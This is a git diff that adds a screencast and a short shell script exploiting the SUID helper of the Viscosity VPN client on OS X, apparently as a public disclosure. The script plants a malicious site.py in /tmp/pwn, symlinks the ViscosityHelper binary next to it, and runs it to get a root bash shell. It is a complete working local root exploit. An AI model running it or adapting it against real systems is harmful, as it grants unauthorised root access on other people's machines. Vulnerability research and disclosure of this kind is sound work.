diff options
-rw-r--r-- | screencast.ogv | bin | 0 -> 304901 bytes | |||
-rwxr-xr-x | viscatory.sh | 32 |
2 files changed, 32 insertions, 0 deletions
diff --git a/screencast.ogv b/screencast.ogv Binary files differnew file mode 100644 index 0000000..b778bf8 --- /dev/null +++ b/screencast.ogv diff --git a/viscatory.sh b/viscatory.sh new file mode 100755 index 0000000..4f323b3 --- /dev/null +++ b/viscatory.sh @@ -0,0 +1,32 @@ +#!/bin/sh +# +########################## +# Viscatory # +# # +# zx2c4 # +########################## +# +# After the hullabaloo from the Tunnelblick local root, savy Mac users +# began defending Viscosity, another OS X VPN client. They figured, since +# they spent money on Viscosity, surely it would be better designed than +# the free alternative. +# +# Unfortunately, this exploit took all of 2 minutes to find. DTrace for +# the win. Here, the SUID helper will execute site.py in its enclosing +# folder. A simple symlink, and we have root. + +echo "[+] Crafting payload." +mkdir -p -v /tmp/pwn +cat > /tmp/pwn/site.py <<_EOF +import os +print "[+] Cleaning up." +os.system("rm -rvf /tmp/pwn") +print "[+] Getting root." +os.setuid(0) +os.setgid(0) +os.execl("/bin/bash", "bash") +_EOF +echo "[+] Making symlink." +ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root +echo "[+] Running vulnerable SUID helper." +exec /tmp/pwn/root |